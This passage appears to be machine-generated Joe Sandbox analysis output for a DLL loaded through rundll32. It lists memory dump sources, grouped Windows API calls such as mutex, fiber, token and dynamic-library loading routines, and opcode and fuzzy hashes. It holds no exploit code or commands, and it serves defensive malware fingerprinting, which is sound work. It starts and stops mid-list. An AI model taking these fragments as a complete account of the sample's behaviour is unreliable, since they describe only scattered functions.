                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLast$ActivateDeactivateDebugLibraryLoadOutputString
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 154522064-0
                                                                                                                                                            • Opcode ID: 965344eefb9a915d8432bbca590bac685295136a7b26c93c3187750371bff74b
                                                                                                                                                            • Instruction ID: f34c18d84746ced0a01f47b07f083a590679d846933bb7c3d2bc77e7959d4bfe
                                                                                                                                                            • Opcode Fuzzy Hash: 965344eefb9a915d8432bbca590bac685295136a7b26c93c3187750371bff74b
                                                                                                                                                            • Instruction Fuzzy Hash: 79216631604F9886F7E28B15F48436963E1F78CBE4F598535EA4983B54DF78CA89C700
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000003.1480402796.000001A994250000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A994250000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_3_1a994250000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 0-3916222277
                                                                                                                                                            • Opcode ID: 618b426ce43a0930aa4f239cb6410ad0b0b63f85316a8ca2cad5e1d25ed90040
                                                                                                                                                            • Instruction ID: facdd8d9c430dbe63394a2c7014967a8bffd767daa2f185b5f98a1827da06762
                                                                                                                                                            • Opcode Fuzzy Hash: 618b426ce43a0930aa4f239cb6410ad0b0b63f85316a8ca2cad5e1d25ed90040
                                                                                                                                                            • Instruction Fuzzy Hash: 03B16035218A088FEB54EF1DD885BAEB7E1FB98310F50466DE449C7256DB34E885CB83

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3894386824.000001A994291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A994291000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_1a994291000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateMutex
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1964310414-0
                                                                                                                                                            • Opcode ID: 6f5cb151aadba70b4aa6e5bafaf7101ce807ceecab62b3beafb4f2b699b4b3ec
                                                                                                                                                            • Instruction ID: 3c2c4f34c9dabcf35ba3422e57196e3d6404eebcbb208cc92e0c61e00753a356
                                                                                                                                                            • Opcode Fuzzy Hash: 6f5cb151aadba70b4aa6e5bafaf7101ce807ceecab62b3beafb4f2b699b4b3ec
                                                                                                                                                            • Instruction Fuzzy Hash: 06E13171508A4D8FE751EF14E895BE6B7F4F7A8340F20067FE84AC2161DB399285CB86

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3894386824.000001A994291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A994291000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_1a994291000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateFiber
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3765768292-0
                                                                                                                                                            • Opcode ID: 4766f349428d01386cf4d80b79a1c7ed56ba3d856ad495534efb26931e194ab3
                                                                                                                                                            • Instruction ID: 35cbc3848425fe550c48745777a1676df04e220050093779aebbeda41d5f4650
                                                                                                                                                            • Opcode Fuzzy Hash: 4766f349428d01386cf4d80b79a1c7ed56ba3d856ad495534efb26931e194ab3
                                                                                                                                                            • Instruction Fuzzy Hash: 51510830719D145FEB69AB289C453AA73D5FB99315F60032EEC9BC31E2DA349C4287C2

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            [Control-flow graph image: basic blocks 1a9942bb4e0 to 1a9942bb52f; API call on the graph: RtlFreeHeap; internal subcall 1a9942b4ce0]
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3894386824.000001A994291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A994291000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_1a994291000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FreeHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3298025750-0
                                                                                                                                                            • Opcode ID: d9c8acccb119fdf6d5691a0567f94fa179966e421fbccb122f962e3160943c6c
                                                                                                                                                            • Instruction ID: 66a65c860e00deb534a0a344fcdead8f0f2b8278a4d1ee660d07614f8fdb6bad
                                                                                                                                                            • Opcode Fuzzy Hash: d9c8acccb119fdf6d5691a0567f94fa179966e421fbccb122f962e3160943c6c
                                                                                                                                                            • Instruction Fuzzy Hash: BDF03034711A088FFB59E7BAACC87B677E2FB9E345F488154A445C6195DB38D841C702

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 426 1800eed50-1800eed5f 427 1800eed6f-1800eed7f 426->427 428 1800eed61-1800eed6d 426->428 430 1800eed96-1800eedae HeapAlloc 427->430 428->427 429 1800eedb2-1800eedbd call 1800dbe9c 428->429 435 1800eedbf-1800eedc4 429->435 431 1800eedb0 430->431 432 1800eed81-1800eed88 call 1800f8138 430->432 431->435 432->429 438 1800eed8a-1800eed94 call 1800ed83c 432->438 438->429 438->430
                                                                                                                                                            APIs
                                                                                                                                                            • HeapAlloc.KERNEL32(?,?,00000000,00000001800EFD8A,?,?,?,00000001800DB982,?,?,?,00000001800DD477,?,?,00000000,00000001800EF007), ref: 00000001800EEDA5
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4292702814-0
                                                                                                                                                            • Opcode ID: e0a46f7dde9e3ba4f24e4de64af5c5f20b6e50e95c5353bc37afd6febfc4c2c8
                                                                                                                                                            • Instruction ID: cac4e9c05afbe4401a5fb00577771fe5509d6320e3ead36a576abe1af2625a72
                                                                                                                                                            • Opcode Fuzzy Hash: e0a46f7dde9e3ba4f24e4de64af5c5f20b6e50e95c5353bc37afd6febfc4c2c8
                                                                                                                                                            • Instruction Fuzzy Hash: 27F0673530568D81FEEB5B629C403E812906B8EBC0F0CC434690AA63C2EE2CCA8C8320
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Token$CurrentErrorInformationLastOpenProcessThread$AllocateCloseEqualFreeHandleInitialize
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1828429344-0
                                                                                                                                                            • Opcode ID: 60c7760728c6a4a746a0896dd83b165dd113752e42dee95d8ef29115c47e0203
                                                                                                                                                            • Instruction ID: 834d127787b2faee8a44574038080d036508957a38a80e6c70e57281afcce267
                                                                                                                                                            • Opcode Fuzzy Hash: 60c7760728c6a4a746a0896dd83b165dd113752e42dee95d8ef29115c47e0203
                                                                                                                                                            • Instruction Fuzzy Hash: F2518072604A44CAEBA2CF21E8943DE37A4FB4CBC9F049119FA4A43B54DF39C649C710
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLastNameTranslate$CodeInfoLocalePageValidValue
                                                                                                                                                            • String ID: utf8
                                                                                                                                                            • API String ID: 3069159798-905460609
                                                                                                                                                            • Opcode ID: 87982d937ac6ebdb5a283f5bc56429e212a605fa33fc48f878455754156b73f4
                                                                                                                                                            • Instruction ID: 411b108c764d4ace3e5c45deb51a3e56b7a9faa629776dbc87eeee4caed17a46
                                                                                                                                                            • Opcode Fuzzy Hash: 87982d937ac6ebdb5a283f5bc56429e212a605fa33fc48f878455754156b73f4
                                                                                                                                                            • Instruction Fuzzy Hash: D591697230878986FBA69B25D4413E923A5F78EBC0F44C129AE48477C6EF79CB59D340
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2591520935-0
                                                                                                                                                            • Opcode ID: 1e9adc1dda38233dd7b140b7e964661ef5807d0160702cade7f715b77bf8ccac
                                                                                                                                                            • Instruction ID: 38b54266c759988556cf6e83805a3aea8ac390e25c82b98d870ebd1b39842dbf
                                                                                                                                                            • Opcode Fuzzy Hash: 1e9adc1dda38233dd7b140b7e964661ef5807d0160702cade7f715b77bf8ccac
                                                                                                                                                            • Instruction Fuzzy Hash: C571ACB2704B588AFB969B60C4547EC33A0BB4EB84F44C429AE0A577C5EF38DA49D350
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2238633743-0
                                                                                                                                                            • Opcode ID: afd66515aa9948ed2773430afda3b35ef4169952e25126d91cfabf7fa8ba1592
                                                                                                                                                            • Instruction ID: 5042ef007f360a4cb06860ac3989e26b2bf5c698eccc4f75d7074bb1ae39fa3f
                                                                                                                                                            • Opcode Fuzzy Hash: afd66515aa9948ed2773430afda3b35ef4169952e25126d91cfabf7fa8ba1592
                                                                                                                                                            • Instruction Fuzzy Hash: 2B411872605B8885EF9B8F22E5543AC67A0B76CFC4F18D121EE4A17B55DF3CCA698310
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1239891234-0
                                                                                                                                                            • Opcode ID: d660c2806080f6d9061bc518b85ca7ecc7ca63128f146637c6a6910cbddaeea0
                                                                                                                                                            • Instruction ID: 89a1bc4f4d59436b05440924b1a16579084504f17a163dcabdca63123fb111a8
                                                                                                                                                            • Opcode Fuzzy Hash: d660c2806080f6d9061bc518b85ca7ecc7ca63128f146637c6a6910cbddaeea0
                                                                                                                                                            • Instruction Fuzzy Hash: 1E317332214F8486DBA1CF25E8843DE73A4F7887A4F544216EE9D43BA9DF78C649CB10
                                                                                                                                                            APIs
Memory Dump Source
• Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: CriticalSection$EnterLeave$CloseCodeConditionDeleteErrorExitHandleLastObjectSingleThreadVariableWaitWake
• String ID:
• API String ID: 1395487824-0
• Opcode ID: 59bc3c8af923ec3b693e2229fb2451515bb8e98908dc82d78f268815ce38a804
• Instruction ID: e66330fb568cf6e2aa5611fb903b84894a8c80f55f8b343ffe77ccc30def8a2f
• Opcode Fuzzy Hash: 59bc3c8af923ec3b693e2229fb2451515bb8e98908dc82d78f268815ce38a804
• Instruction Fuzzy Hash: 62E15A32601B489AEB92CF65E4443DC37B5F348B98F558126EB8D47B95DF38C6A9C340
APIs
  • Part of subcall function 0000000180099C70: InitializeCriticalSection.KERNEL32 ref: 0000000180099CAA
  • Part of subcall function 0000000180099C70: InitializeCriticalSection.KERNEL32 ref: 0000000180099CB8
  • Part of subcall function 0000000180099C70: InitializeCriticalSection.KERNEL32 ref: 0000000180099CC6
  • Part of subcall function 0000000180099C70: InitializeCriticalSection.KERNEL32 ref: 0000000180099D13
  • Part of subcall function 0000000180099C70: RtlInitializeConditionVariable.NTDLL ref: 0000000180099D21
• RtlInitializeConditionVariable.NTDLL ref: 000000018009BAF7
• InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,0000000180001219), ref: 000000018009BB64
• InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,0000000180001219), ref: 000000018009BC71
  • Part of subcall function 00000001800D505C: Concurrency::cancel_current_task.LIBCPMT ref: 00000001800D508C
  • Part of subcall function 00000001800D505C: Concurrency::cancel_current_task.LIBCPMT ref: 00000001800D5092
• InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,0000000180001219), ref: 000000018009BD04
• CreateEventW.KERNEL32(?,?,?,?,?,?,?,?,?,0000000180001219), ref: 000000018009BD15
• InitializeCriticalSection.KERNEL32 ref: 000000018009BDFA
• DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000180001219), ref: 000000018009BEA7
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000180001219), ref: 000000018009BF31
• DeleteCriticalSection.KERNEL32 ref: 000000018009BF62
• DeleteCriticalSection.KERNEL32 ref: 000000018009BF94
• DeleteCriticalSection.KERNEL32 ref: 000000018009BF9F
• DeleteCriticalSection.KERNEL32 ref: 000000018009BFAA
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: CriticalSection$Initialize$Delete$Concurrency::cancel_current_taskConditionVariable$CloseCreateEventHandle
• String ID:
• API String ID: 230857104-0
• Opcode ID: a877f73eb4a0cc73d247b8665ae12c0b89afea62d282fefbff238ad0fbcf9c11
• Instruction ID: 16dd56e71a98a8fe38ead4268d941e7a59e1ec6387c67001032f1325c4e9e75d
• Opcode Fuzzy Hash: a877f73eb4a0cc73d247b8665ae12c0b89afea62d282fefbff238ad0fbcf9c11
• Instruction Fuzzy Hash: 5ED17132405F8882E396CB20FD943D9B3E9FB9A790F51D21AD6DA42670DF78D698C740
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: Value$ErrorLast$Heap$AllocFree
• String ID:
• API String ID: 570795689-0
• Opcode ID: 1dcd191b440b39cb994a857398b107563d6fd41073885bb539776dc5a2793a2a
• Instruction ID: 9ec4bcfaacd67bd7be5f2c6c23ff2cc11b1865c540bc1b41079cacaeb76c1345
• Opcode Fuzzy Hash: 1dcd191b440b39cb994a857398b107563d6fd41073885bb539776dc5a2793a2a
• Instruction Fuzzy Hash: 98416F3030468D42FAEB673199A53FD52425F4D7F0F65C728BA366ABD2DE289B4D9300
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: CloseCodeErrorExitHandleLastObjectSingleThreadWait
• String ID:
• API String ID: 715548631-0
• Opcode ID: 701ce82fddf24a6dc0cc6819650e4a14b1158c76ac60a64b1f577d277cb7041b
• Instruction ID: d4a4ad110a7379173bcc36970285a8a200778f275078fe0ae0b16c97a83e6880
• Opcode Fuzzy Hash: 701ce82fddf24a6dc0cc6819650e4a14b1158c76ac60a64b1f577d277cb7041b
• Instruction Fuzzy Hash: E702AF72606B8885EB96CFA9E4443ED77A5F788BD8F148115EE4D03BA4DF78C649C340
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: std::_$Concurrency::cancel_current_taskLockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
• String ID: bad locale name$false$true
• API String ID: 461674175-1062449267
• Opcode ID: 1a960a7bf9c5bdb67dcab4a702383698bc1a37f2da21523b0c3c2fa08cdc4277
• Instruction ID: 7f4c0dd69d64a2e519a89c0408eed1bde46919adf4286db9a4fea514131e2538
• Opcode Fuzzy Hash: 1a960a7bf9c5bdb67dcab4a702383698bc1a37f2da21523b0c3c2fa08cdc4277
• Instruction Fuzzy Hash: 39718032701B448AFB96DFB0D4913DC33B5EB48788F458129AE4967B5ADF34C619C398
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: Initialize$CriticalSection$Concurrency::cancel_current_taskConditionVariable$CreateSemaphore
• String ID:
• API String ID: 587327768-0
• Opcode ID: 073037f3f5bcf2f7dd3c5580214dcea6dca69115b8242414d5a9b36cdc0c840b
• Instruction ID: bacc5767debf166278b71937d87c4d40db06fba7c828773fc2802f3724ac9812
• Opcode Fuzzy Hash: 073037f3f5bcf2f7dd3c5580214dcea6dca69115b8242414d5a9b36cdc0c840b
• Instruction Fuzzy Hash: 15E1F532201F849AE7968F24E8843CD77B8F749758F519229DB9D53B64EF38C6A9C340
APIs
• FreeLibrary.KERNEL32(?,?,?,00000001800F0774,?,?,?,?,00000001800DB89A), ref: 00000001800F00A0
• GetProcAddress.KERNEL32(?,?,?,00000001800F0774,?,?,?,?,00000001800DB89A), ref: 00000001800F00AC
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                            • API String ID: 3013587201-537541572
                                                                                                                                                            • Opcode ID: bb80c46524efd334e0948ec5fde6f5b3acf71997aa830e5d0c0555cb348075c0
                                                                                                                                                            • Instruction ID: 9e20b040cd1b5661f49696f8373896ce597b257fd6a3f0defee87b89056d177f
                                                                                                                                                            • Opcode Fuzzy Hash: bb80c46524efd334e0948ec5fde6f5b3acf71997aa830e5d0c0555cb348075c0
                                                                                                                                                            • Instruction Fuzzy Hash: 0F41E032311A4886EB97CB16A8087E62391BB4DBE0F59D129BD0D577D4EE39CA4D9300
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                            • String ID: f$p$p
                                                                                                                                                            • API String ID: 3215553584-1995029353
                                                                                                                                                            • Opcode ID: ed79370b00d8e8658ded3e492e09794217c34b99c512f83fb9569cde87e5cc5f
                                                                                                                                                            • Instruction ID: 96a00a691172ba3443d11c4982911cf9766be878af63e4870790c223ab62484d
                                                                                                                                                            • Opcode Fuzzy Hash: ed79370b00d8e8658ded3e492e09794217c34b99c512f83fb9569cde87e5cc5f
                                                                                                                                                            • Instruction Fuzzy Hash: A712947260424B86FBA65B14E054BFD72A1F7487D0FD8C215FA9147AC4DF38C6889F26
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ByteCharMultiStringWide
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2829165498-0
                                                                                                                                                            • Opcode ID: 44485f7753f9c64bca2118c71e251ed8770b17291ac18f0f18f66950d9041ec7
                                                                                                                                                            • Instruction ID: 5a97a349b29dd6e7b5ac608a3e284f06584119dc4d9a85b610e319804b2a6361
                                                                                                                                                            • Opcode Fuzzy Hash: 44485f7753f9c64bca2118c71e251ed8770b17291ac18f0f18f66950d9041ec7
                                                                                                                                                            • Instruction Fuzzy Hash: D091727360078486EBE68F2594403ADB2E5F748BE8F548725FE594BBD4DF38C6098710
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                            • String ID:
